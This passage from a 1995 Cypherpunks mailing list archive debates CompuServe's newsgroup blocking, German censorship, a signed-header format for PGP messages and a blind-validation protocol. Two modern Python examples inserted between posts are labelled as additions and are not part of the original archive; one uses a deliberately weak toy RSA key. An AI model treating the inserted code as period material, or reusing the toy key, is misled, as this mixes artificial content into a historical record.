ban the spread of 'dangerous' thoughts on the Internet. This was clear
years ago. Let me emphasize a few facts:

o Non-GAK Encryption will be outlawed.
o 'Immoral' texts and pictures will be banned.
o The dissemination of 'dangerous ideas' will become a felony.

At best, Cypherpunks can hope to provide the infrastructure that will allow
an underground to communicate semi-securely. We are unable to stop the
global tidal wave of fascism. Let's not waste our time on bemoaning the
freedoms crushed in its path. We have more important work to do.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 00:46:03 +0800
To: cypherpunks@toad.com
Subject: Re: another anonymous poster helping to destroy our rights
In-Reply-To: <01HZDR1AL5S48Y55Y6@mbcl.rutgers.edu>
Message-ID: <94HXgD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> writes:
> From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri" 28-DEC-1995 01:36:46.58
>
> >= the list charter can ask for people to submit to various practices on
> the honor system, such as not using pseudonyms. cryptoanarchists who
> hate the idea of trust are of course going to object to the honor system,
> because "that which cannot be enforced should not be prohibited".
> ----------------
> 	Does this last idea leave much doubt in anyone's mind that "Vladimir Z.
> Nuri" is a Detweiler tentacle?

Yes. I've exchanged several e-mails with LD.  LD is much smarter.
(Unless he's playing dumb... :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 00:49:17 +0800
To: cypherpunks@toad.com
Subject: Re: easy avoidance of PGP signature forgeries and reuse
In-Reply-To: <Pine.BSD.3.91.951229172352.26978C-100000@usr5.primenet.com>
Message-ID: <y9HXgD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


attila <attila@primenet.com> writes:
> 	I never paid much attention to the problem other than to avoid
>     it by forcing it --i.e. list the destination and the send inside the
>     signature block, thus:
>
>     ----------------- BEGIN PGP SIGNED TEXT
>
>     To: john doe <john@box.com>
>     Newsgroups: sci.crypt
>     From: jane roe <jane@topsey.turvey.com>
>     Subject: that's all folks!
...


Good - that's just what I've proposed :). However right now the overwhelming
majority of people who PGP-sign their writings, don't include a copy of the
headers within the signed portion.

Those few who do, all seem to use different formats, so the signed headers
cannot be easily compared to the headers in the actual envelope by a program.

I propose a format below.

> 	with e-mail, e-letters, direct faxes, etc. it is too easy to
>     ignore the courtesy header. From a standpoint of security, you have
>     blown away each of the attacks outlined in your article in so much as
>     the signature will not compute if the courtesy block is omitted.

I totally agree; that's why I propose copying that info in the signed portion
"by default".

> 	personally, I do not think PGP 3 should attempt to solve the
>     problem. Most of the headers involved are applied _after_ the message
>     leaves the mail program; and, PGP interfaces are virtually the same
>     as invoking an alternate editor, which gets you nothing.

I don't think that a protocol for signing headers that requires mime/multipart
is going to be widely used, especially for Usenet postings. I've thought about
it and came up with the following idea for the syntax:

----BEGIN PGP SIGNED MESSAGE----

some text

----BEGIN PGP SIGNED HEADERS----

From: address                          [all these are optional]
To: address[,address]...
Newsgroups: group[,group]...
Date: rfc 822 date
Subject: subject

----BEGIN PGP SIGNATURE----
Version 2.6.2

12341234...

----END PGP SIGNATURE----

The "signed headers" portion may contain the following optional fields:

From: address -- the address associated with the key used to sign this message

To: address[,address]... -- addresses (user@host, no names) of the recipients
in RFC 822 To: and Cc: headers (not the Bcc: recipients). Addresses mangled
by various gateways shouldn't verify.

Newsgroups: group[,group]... -- the newsgroups from the RFC 1036 header

Date: and Subject: -- should match the header

The sequence of events would be:
* pick the addressees and the newsgroups + compose the text
* sign the signed portion
* post/e-mail the result to the specified addressees/newsgroups.

(Of course, the poster could lie and claim in the signed portion that the
article is being posted to alt.sex.pedo when he himself posts it to misc.kids:)

If a standard like this catches on, and is integrated into PGP-aware
news/e-mail programs, then it's a simple exercise to write a little script to
look for BEGIN PGP SIGNED HEADERS and compare the information inside it with
the RFC 822/1036 headers outside the signed portion of the message. It could
be done within PGP too.


---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
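
The "little script" described in the post above, as an added example that is not the poster's or PGP's own code: it compares the proposed signed-headers block with the RFC 822/1036 headers outside it and returns the fields that disagree. It assumes PGP has already verified the signature over the signed portion (no signature check is done here), accepts four or five dashes in the markers, and runs on constructed sample messages with made-up addresses.

```python
import re
from email import message_from_string
from email.utils import getaddresses, parsedate_to_datetime

# Block delimiters as written in the proposal (real PGP armor uses five dashes).
BLOCK = re.compile(
    r"^-{4,5}BEGIN PGP SIGNED HEADERS-{4,5}\s*\n(.*?)^-{4,5}BEGIN PGP SIGNATURE-{4,5}",
    re.S | re.M)


def addrs(values):
    """Bare user@host set; display names dropped, compared exactly so that
    gateway-mangled addresses do not verify."""
    return {a for _, a in getaddresses(values) if a}


def groups(value):
    return {g.strip() for g in (value or "").split(",") if g.strip()}


def when(value):
    """Parsed date so equal instants match; raw text if it will not parse."""
    try:
        return parsedate_to_datetime(value)
    except (TypeError, ValueError):
        return value


def norm(value):
    return " ".join((value or "").split())


def check_signed_headers(raw: str) -> list:
    """Names of signed fields that disagree with the envelope headers."""
    msg = message_from_string(raw)
    m = BLOCK.search(msg.get_payload())
    if m is None:
        return ["missing signed-headers block"]
    signed = message_from_string(m.group(1).strip() + "\n\n")
    mismatches = []

    def differ(field, signed_val, outer_val):
        # Every field is optional: only fields present in the block are checked.
        if signed[field] is not None and signed_val != outer_val:
            mismatches.append(field)

    differ("From", addrs(signed.get_all("From", [])), addrs(msg.get_all("From", [])))
    differ("To", addrs(signed.get_all("To", [])),
           addrs(msg.get_all("To", []) + msg.get_all("Cc", [])))   # Bcc excluded
    differ("Newsgroups", groups(signed["Newsgroups"]), groups(msg["Newsgroups"]))
    differ("Date", when(signed["Date"]), when(msg["Date"]))
    differ("Subject", norm(signed["Subject"]), norm(msg["Subject"]))
    return mismatches


# Constructed sample: one signed body, delivered under two different envelopes.
SIGNED_BODY = """\
----BEGIN PGP SIGNED MESSAGE----

that's all folks!

----BEGIN PGP SIGNED HEADERS----

From: jane@example.org
To: john@example.com
Newsgroups: sci.crypt
Date: Sat, 30 Dec 1995 00:49:17 -0500
Subject: test post

----BEGIN PGP SIGNATURE----
Version 2.6.2

(signature elided)
----END PGP SIGNATURE----
"""


def envelope(to, newsgroups):
    return ("From: Jane Roe <jane@example.org>\n"
            f"To: {to}\n"
            f"Newsgroups: {newsgroups}\n"
            "Date: Sat, 30 Dec 1995 00:49:17 -0500\n"
            "Subject: test post\n\n" + SIGNED_BODY)


ORIGINAL = envelope("John Doe <john@example.com>", "sci.crypt")
REPOSTED = envelope("list@example.net", "alt.test")   # same signed text, new targets

if __name__ == "__main__":
    print(check_signed_headers(ORIGINAL), check_signed_headers(REPOSTED))
```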




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Dec 1995 08:32:13 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <ad0ab5bb2b021004cfc2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 AM 12/30/95, Ulf Moeller wrote:

> From the comment by Niklaus Haubltzel:
>
>"Reality cannot be outlawed, only improved, and many still hope that
>complete freedom of information and opinion in computer networks can
>contribute to that. But the company of CompuServe does not seem to
>be interested in that. They only want their customers' money, but
>not their freedom. [...] Like any censorship, this one comes with
>hypocrisy. Towards their paying customers, CompuServe claims to have
>been forced by German prosecutors. Thus one lie creates another.
>That they were forced is out of the question. It is only in
>dictatorships that the prosecutors judge the defendants - that is why
>dictatorships need censors."

Well said by this person! (Except for the point about Compuserve's
"greed"...greed is good.)

I am hopeful that Germany can move away from this censorious position
(whether they prosecuted CS or not, there was clearly the threat of
prosecution, and CS caved into it).

As with the Cornell case, where students "volunteered" to perform
"community service" and thus Cornell did not otherwise discipline them for
their speech (the "75 Reasons" joke they sent to their friends), the mere
possibility of punishment/sanction is usually sufficient. This is called
"the chilling effect" in free speech discussions.

Longterm, the solution still lies with moving toward smaller units directly
accessing the Net, thus making threats harder to effectively mount.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sun, 31 Dec 1995 01:00:20 +0800
To: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Subject: Re: Zensoren ueber Alles
Message-ID: <199512301554.KAA25650@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 30, 1995 00:04:01, '"Ed Carp [khijol SysAdmin]"
<erc@dal1820.computek.net>' wrote: 
 
 
> 
>This "Tall Paul" fellow said: "Based on other news reports, I conclude
>that CompuServe lied in both areas." 
> 
>So?  Companies lie all the time - the bigger the company, the bigger the  
>lie, in my experience.  Companies are like governments - they will get  
>away with what they can until caught.  Even then, they rarely stop - it  
>just goes undercover. 
> 
 
I was not presenting a political analysis behind CompuServe's actions, nor
writing a simple personal opinion. I was presenting what I considered a
factually correct objective observation of their actions.   
 
>> It did none of these things. It cut off all customers to an enormous number
>> of groups. It inferentially violated property rights (i.e. contracts) to
>> customers promised internet access and now provided only a crippled version
>> thereof. And it lied about the whole thing.  
> 
>Again, so?  All that it will do is to drive people away from Compu$erve  
>into the arms of other service providers.  Maybe some of them will even  
>figure out what a *real* ISP is... 
> 
 
How accurate is Carp's conclusion? Not very, in my opinion. The inaccuracy
develops from the excessively narrow economic focus of Carp's thinking. It
is an analysis that ignores the *social* implications of the CompuServe
decision, treating the entire matter almost as something that would only
interest CompuServe, Microsoft, AOL, and Prodigy stockholders. 
 
Among the other effects *already* visible, the decision has: 
 
1) Led to an enormous amount of anti-net publicity by incompetent editors
on the national news; 
 
2) Furthered the development of hysteria and hysterical organizing; ("I
don't care if it is censorship," said one mommy interviewed on the national
news. "It is good for my children.") 
 
3) Furthered the development of the right-wing "family rights" crowd; ("We
need to follow Germany's lead," said one official from one of the "family
rights" crowd interviewed on the national news.) 
 
4) Promoted more dishonesty as a perfectly reasonable and perfectly
acceptable means of engaging in social discourse; 
 
I predict it will also be used for additional attacks on issues of
encryption, privacy,  and anonymity. That is, I think we will see
statements like "We need to be especially vigilant to make sure that the
perverts are not smuggling banned material into the country via the
internet. This means we have to block encryption, monitor user accounts
even more carefully for potential perverts, etc. etc." 
 
Finally, I am not sure that Carp's economic analysis of the CompuServe
decision is correct. The large internet service providers (LISP) form an
oligopoly and, I think, the LISP all abandon hopes that they can become a
monopoly. One form of oligopolistic co-operation is the creation of market
niches within acceptable bounds of market share for each of the
oligopolistic corporations. That is, CompuServe just launched a huge
organizing effort to grab the "family" niche within the LISP market. I do
not have the facts needed for a detailed quantifiable analysis of the LISP
oligopoly (and frankly would not want to devote the time to such an
analysis even if I did.) So I'll conclude here by stating that CompuServe's
market share may increase because of their decision as parents move from
the "family hostile" MSN/AOL/etc. to the "family friendly" CompuServe. 
 
If sexual hysteria is much stronger than views against censorship, for
freedom of speech and inquiry, then we may see the other LISP groups
emulate CompuServe to protect their oligopolistic market share. That is, if
*significant* portions of AOL/MSN/etc. customers are motivated by sexual
hysteria and start moving their accounts to CompuServe we will see
AOL/MSN/etc. become equally "family friendly" to stop the customer shifts. 
 
     --tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 1995 01:23:13 +0800
To: cypherpunks@toad.com
Subject: Re: Chinese Cypherpunk quote  [NOISE]
In-Reply-To: <199512300011.QAA16526@urchin.netscape.com>
Message-ID: <ZuJXgD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Corey Bridges <corey@netscape.com> writes:
> To reply simply: Wrong -- the will of the people is as fickle as the wind.
> Follow the will of the people, and you run your country by following fads.
> Mob rule and all that. We're in deep trouble if we ever get a true democracy.

One of the things Adolph Hitler and Bill Clinton have in common is that
both were democratically elected leaders.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 31 Dec 1995 02:24:17 +0800
To: cypherpunks@toad.com
Subject: Positive Implications of the Compuserve Moves
Message-ID: <ad0ab8672c0210047052@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:54 PM 12/30/95, tallpaul wrote:

>Among the other effects *already* visible, the decision has:
>
>1) Led to an enormous amount of anti-net publicity by incompetent editors
>on the national news;

On the positive side, I've heard some commentators (mainly on CNBC, an
all-business news channel) ask pointed questions, and note that if every
country imposes its own standards on the Internet/Usenet, then the
implications are dire.

The strong reaction developing against Compuserve could rebound to the
benefit of killing off the Exon/Hyde language, in the best of all
situations. (The Telecom Bill is still being thrashed out, and the CS
controversy may remind folks of the implications of their actions.)

>4) Promoted more dishonesty as a perfectly reasonable and perfectly
>acceptable means of engaging in social discourse;

I predict Compuserve will lose so much of what little respect they have
eked out amongst Internet users that they will be eventually forced to
provide the 200 dropped newsgroups, issue an apology, and probably retire
or reassign a few executives as a show of public remorse. You heard it here
first.

And many users are seeing the problems with monolithic, primitive ISPs like
Compuserve, AOL, Prodigy, etc., and are moving to get "real" Net
connections. This is a Good Thing.

>Finally, I am not sure that Carp's economic analysis of the CompuServe
>decision is correct. The large internet service providers (LISP) form an
>oligopoly and, I think, the LISP all abandon hopes that they can become a

LISP?

(define CompuserveSucks (lambda () (display ".") (CompuserveSucks)))
(CompuserveSucks)


Recurses, foiled again!

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 30 Dec 1995 09:59:17 +0800
To: lstewart@prisminc.com (lstewart)
Subject: Re: Housewarming/birthday party
In-Reply-To: <9502157953.AA795307204@prisminc.prisminc.com>
Message-ID: <199512300046.LAA16884@suburbia.net>
MIME-Version: 1.0
Content-Type: text


>      The price of condo living: There is no guest parking in the complex, 
>      and the party must end by 10pm.  Please help us get along with our new 
               ^^^^^             ^^^^
>      neighbors by respecting the condo rules.  Thanks!
> 

That's not a party. That's an after-school tupperware get-together.

Cheers,

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Dec 1995 04:27:34 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: last straw
Message-ID: <m0tW7Fu-0008zAC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:34 AM 12/30/95 -0800, you wrote:
>I've decided to cancel my CrampuNerve account and send the weasels a msg
>telling them why. I encourage everyone here to do the same with your CI$
>account (if you still have one). These [insert colorful expletive here]s
>only understand one thing: cold ca$h. Thus, the only effective way to send
>them an indication of one's displeasure at their poor precedent-setting is
>to vote with one's wallet.
>
>Any who are still unfortunate enough to rely on CI$ for Internet/Usenet
>access are getting reamed price-wise anyway, not to mention suffering poor
>reliability and now access, so maybe a few of them could also take this
>opportunity to migrate to an ISP with some real "backbone."

I don't have a CSERVE account, and never have.  But yesterday, I called a
friend (who has such an account) I talk to every two weeks or so.  The
conversation went something like this:

"Hi Greg."
"Hi Jim."
"I suggest that you get rid of your Comp..."   (he cuts me off in
mid-sentence, anticipating the entire subject of the call)
"I'm doing that as we speak, Jim"
"...because they just..."  (I continued the thought, but he cut me off again)
"That's EXACTLY why I'm doing it, Jim."
(mutual laughter as we realize the irony of the situation.)


Somehow, I think Compuserve is going to get the message.

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 31 Dec 1995 01:32:47 +0800
To: Ulf_Moeller@public.uni-hamburg.de
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
In-Reply-To: <m0tVzI0-00007hC@ulf.mali.sub.org>
Message-ID: <199512301700.MAA08304@homeport.org>
MIME-Version: 1.0
Content-Type: text


	This trend towards governments saying 'This might be illegal,
we won't tell you' is very disturbing.  Doug Barnes reported on it
being the tactic of choice in forcing banks to fall in line & spy on
their customers.

	Compuserve should be encouraged to get a ruling from the
Bavarian/German government on the legality of the groups.  (Does the
EU provide freedom of speech protections, or simply freedom of
inoffensive speech?)  Also, how does this interact with the
harmonization of publications laws with places such as the
Netherlands?  The EU can't be expected to thrive if each country has
totally different publishing laws.

	Alternately, if there are cypherpunks who spend time in
alt.config, we might create groups such as alt.intimate.stories,
alt.intimate.bondage.duct-tape, etc.


Ulf Moeller wrote:

| This is today's page 1 article in the newspaper "die tageszeitung".
| 
| The article "Zensur im Cyberspace" (censorship in cyberspace)
| and the comment "Die Moral der Biedermänner" are available
| http://www.prz.tu-berlin.de/~taz until tomorrow.
| 
|  From the article (my translation):
| 
| "The Bavarian department of public prosecution 'has left it to their
| discretion' to take the 'necessary steps' on their own, to avoid
| 'possible punishability of the management in Germany'. An advice that
| CompuServe has followed although there is no kind of legal obligation
| for it. Legally, it is still perfectly unclear if enterprises that
| provide access to the Internet can be held responsible in any way for
| the contents distributed there."



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf_Moeller@public.uni-hamburg.de (Ulf Moeller)
Date: Sat, 30 Dec 1995 19:50:09 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <m0tVzI0-00007hC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>Thus, it is the government of Germany in this case which is "censoring."

This is today's page 1 article in the newspaper "die tageszeitung".

The article "Zensur im Cyberspace" (censorship in cyberspace)
and the comment "Die Moral der Biedermänner" are available
http://www.prz.tu-berlin.de/~taz until tomorrow.

 From the article (my translation):

"The Bavarian department of public prosecution 'has left it to their
discretion' to take the 'necessary steps' on their own, to avoid
'possible punishability of the management in Germany'. An advice that
CompuServe has followed although there is no kind of legal obligation
for it. Legally, it is still perfectly unclear if enterprises that
provide access to the Internet can be held responsible in any way for
the contents distributed there."

 From the comment by Niklaus Haubltzel:

"Reality cannot be outlawed, only improved, and many still hope that
complete freedom of information and opinion in computer networks can
contribute to that. But the company of CompuServe does not seem to
be interested in that. They only want their customers' money, but
not their freedom. [...] Like any censorship, this one comes with
hypocrisy. Towards their paying customers, CompuServe claims to have
been forced by German prosecutors. Thus one lie creates another.
That they were forced is out of the question. It is only in
dictatorships that the prosecutors judge the defendants - that is why
dictatorships need censors."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dietrich J. Kappe" <goedel@cerebus.redweb.com>
Date: Sun, 31 Dec 1995 03:37:57 +0800
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <Pine.SUN.3.91.951229220043.25326A-100000@unix5.netaxs.com>
Message-ID: <199512301926.NAA29572@cerebus.redweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>   Munich prosecutor Manfred Wick confirmed Friday that Bavarian state
    ^^^^^^                                               ^^^^^^^^
>police investigators searched CompuServe's networks and computers last
>month for child pornography, but he would not say what they found.
>   "We didn't threaten them with charges," Wick said.

It's worth mentioning that the state of Bavaria (Bayern) is the most
conservative and one of the most Catholic provinces in Germany. There
was an article in Zeit a few months ago about a division of the police
investigating on-line crime, although at the time it was more BBS and
Video Text related. As a former resident of Bavaria, I am not one bit
surprised at these scare tactics.

-- 
Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 31 Dec 1995 03:09:25 +0800
To: cypherpunks@toad.com
Subject: PLA_gue  Germ Terrorism
Message-ID: <199512301830.NAA05708@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-30-95. To update the list of terrorist threats, the Wash
   Post reports on the purchase in May of bubonic plague germs 
   by "white supremacist" Larry Wayne Harris, his bust by the 
   FBI and germ teams, prosecutors' amazement that possession 
   of such deadly micro-organisms is not illegal, and the 
   consequent plea bargain of wire fraud with probation.

   The article explains that possession of "terrorist" mites
   is not prohibited due to a legal loophole which allows
   scientific trade in wee supremacists. There are calls for 
   outlawing the meat-eaters by closing the gap in the 
   anti-terrorism bill before Congress. But scientists say 
   how dare you spit in our nanodeath soup.

   It notes that offshore spread is Commerce regulated.

   BTW, why this story now about summer events? For the
   anti-terrorist bill, TLA-plague growth, any germ any?


   PLA_gue












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Sun, 31 Dec 1995 03:18:16 +0800
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <199512301850.NAA17165@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Peter D. Junger wrote:
> 
> One should also notice that Bavaria is only one state in the German
> Federal Republic; this case is more like Texas investigating
> Compuserve than the United States federal government investigating
> Compuserve.  Bavaria is the stronghold of what can properly be called
> the (Catholic) Religious Right in Germany.  It should also be noticed
> that in general German publications and television seem to be less
> constrained in publishing materials that in the United States would be
> called ``indecent'' by some than are United States publications and
> broadcasters.
> 

In some areas they may be a tad more liberal, but in general they
are not.  They do indeed have laws preventing freedom of speech
(especially with regard to right wing politics, the holocaust etc.)
Somebody correct me if I'm wrong, but I believe that all German ISPs
do not carry various political/controversial newsgroups such as
alt.revisionism due to legal reasons.

A more serious problem for those of us in EU countries is that the
German government have influence on other EU states - only a week or
two ago they tried to push through European wide legislation
restricting freedom of speech.


Gary
- --
"If there be time to expose through discussion the falsehood and
fallacies, to avert the evil by the processes of education,
the remedy to be applied is more speech, not enforced silence."
	-- US Supreme Court Justice Louis Brandeis
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMOWKESoZzwIn1bdtAQEBQwGA1jg9rwAJgB/PlkzItUp4JOjScswcqxR5
hqSJK/rj2o6cNN7Z9OGVD8+9VMJi7BEp
=XTJn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 31 Dec 1995 04:33:56 +0800
To: cypherpunks@toad.com
Subject: Re: blind validation
In-Reply-To: <199512300908.EAA07360@opine.cs.umass.edu>
Message-ID: <199512302007.OAA00861@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> I'm not convinced that your last point is true. It appears that the signed
> Bobnet-access-number is still just a transferrable ticket. Charlie can
> place an order with Bob, forward the Bobnet-access-number to Alice, wait for
> Alice & Trent to do the blinding & signing tango, forward the signed Bobnet-
> access-number to Bob, and get the goods from Bob.
>   
> Charlie can't use the signed Bobnet-access-number to prove to Trent
> that he's Alice. In fact, since it's unblinded, Charlie can't even prove
> that he's linked to a particular validation performed by Trent. (If Alice
> foolishly gave him the blinded version too, he could show that he shares
> Alice's knowledge about this validation.) 


> I'm not convinced that your last point is true. It appears that the signed
> Bobnet-access-number is still just a transferrable ticket. Charlie can
> place an order with Bob, forward the Bobnet-access-number to Alice, wait for
> Alice & Trent to do the blinding & signing tango, forward the signed Bobnet-
> access-number to Bob, and get the goods from Bob.

Yes and no.  It is just a ticket, except that there are time 
constraints.  If Alice doesn't respond in some reasonable time while the 
protocol is going on, Bob quits.  (I didn't say that explicitly, my 
mistake.)

Part of what I was trying to say, but didn't say well, is that Alice can 
*always* act as a proxy, ie., she can always get a file and give it to 
someone else.  But Sam can't bust Bob if Alice gives the file away.  
He'll have to go after Alice.

The whole point of the exercise is to convince Sam that Bob hasn't given
away any files to minors or Europeans or whoever else Sam feels shouldn't
have them. 

This puts a whole new spin on the situation, a different sort of attitude 
than we usually have when we're talking about crypto protocols.  The 
entire ecash system has to have integrity.  If someone figures out how to 
forge or double spend ecash, it doesn't do the bank any good to say, "We 
didn't do it, this person with an account did it."

But we can't keep erotica out of the hands of minors, or home grown 
crypto out of the hands of Europeans.  That means that from a certain 
point of view, the system as a whole won't have integrity.  But no 
system can have integrity, because Alice can always act as a proxy.

The point is to set things up so that:

1.	Alice can remain anonymous
2.	Bob can keep Sam off his back
3.	Sam has to admit that the system, imperfect as it is, is as good
	as other systems.  (Alice can act as a proxy, but she could do 
	that at a liquor store or a pornography shop also.  If Alice had
	to give her ID, she could still give away the file.)

The through the looking glass aspect of this is that from a practical
standpoint, there's no real difference between Alice giving away her
credentials and Alice acting as a proxy.  But Sam foists upon us the
necessity of arguing what are almost semantic points.  If Bob always gives
the files to people Sam says are ok, then Bob won't go to jail.

It is true that Alice could act as a beard for someone in the transaction,
but in my opinion it's not unreasonable to claim that if she does she's
acting as a proxy.  The attacker still has to go to Alice and say, "give
me this file", and Alice still has to agree and interact with Trent in the
moment to make it work.  Going back to the liquor store analogy, Alice 
can go into the liquor store with a kid, have the kid point to a bottle 
on the shelf, go to the register, and then buy it.

But she can't give her ID away to the kid and let the kid go to the liquor
store on his own.  Either way the kid gets drunk, but if Alice can't give
away her ID, Bob won't have to worry about losing his license. 

Alice, of course, has to watch out for Sam.

> 3. is OK as long as Alice trusts Trent. The trick is selecting a Trent
> trusted by both Alice and Sam ;)

Very true.

> 
> -Futplex	<futplex@pseudonym.com>
> 
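
The exchange argued over in this message, as an added sketch that is not code from the thread: Bob issues a one-time access number with a deadline, Trent signs it blind, and Bob accepts the unblinded signature only once and only in time. It assumes textbook RSA blinding for the "blinding & signing tango", a toy key for Trent, and hypothetical names (`Bob`, `Trent`, `run_order`, the 60-second window).

```python
import hashlib
import math
import secrets

# Toy RSA key for Trent built from two Mersenne primes so the example runs
# offline. Assumption for illustration only; far too weak for real use.
P, Q = 2**61 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # Trent's private exponent


def digest(number: bytes) -> int:
    """Map an access number into Z_N (hash-then-sign)."""
    return int.from_bytes(hashlib.sha256(number).digest(), "big") % N


class Bob:
    """Server: hands out one-time access numbers and enforces the deadline."""

    def __init__(self, window=60):
        self.window = window
        self.open_orders = {}           # access number -> time issued

    def new_order(self, now):
        number = secrets.token_bytes(16)
        self.open_orders[number] = now
        return number

    def redeem(self, number, signature, now):
        issued = self.open_orders.pop(number, None)   # single use
        if issued is None:
            return "unknown or already used"
        if now - issued > self.window:                # "Bob quits"
            return "too late"
        if pow(signature, E, N) != digest(number):
            return "bad signature"
        return "ok"


class Trent:
    """Validator: knows who is asking, never sees what he signs."""

    def __init__(self, approved):
        self.approved = set(approved)
        self.seen = []                  # everything Trent learns

    def sign_blinded(self, who, blinded):
        if who not in self.approved:
            return None
        self.seen.append((who, blinded))
        return pow(blinded, D, N)


def blind(number):
    """Alice: hide the access number from Trent with a random factor r."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return digest(number) * pow(r, E, N) % N, r


def unblind(blind_sig, r):
    """Alice: strip r, leaving Trent's plain signature on the number."""
    return blind_sig * pow(r, -1, N) % N


def run_order(bob, trent, who, ordered_at, redeemed_at):
    """One full order: Bob -> Alice -> Trent -> Alice -> Bob."""
    number = bob.new_order(ordered_at)
    blinded, r = blind(number)
    blind_sig = trent.sign_blinded(who, blinded)
    if blind_sig is None:
        return "not validated"
    # Whoever presents (number, signature) to Bob gets the goods: the
    # signed number is a bearer ticket, limited only by the time window.
    return bob.redeem(number, unblind(blind_sig, r), redeemed_at)
```

The signed number stays a transferable ticket, as the quoted objection says; what the deadline and single use add is that a validated party must take part while each order is open.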





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve@miranova.com (Steven L. Baur)
Date: Sun, 31 Dec 1995 08:40:24 +0800
To: cypherpunks@toad.com
Subject: Re: easy avoidance of PGP signature forgeries and reuse
In-Reply-To: <y9HXgD18w165w@bwalk.dm.com>
Message-ID: <m2n38am8ht.fsf@diana.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[sample implementation for Gnus is included]
>>>>> "Dimitri" == Dimitri Vulis <dlv@bwalk.dm.com> writes:

    Dimitri> I propose a format below.

See the PGP header block attached to this message as an example of
this proposed format.

    atilla> with e-mail, e-letters, direct faxes, etc. it is too easy
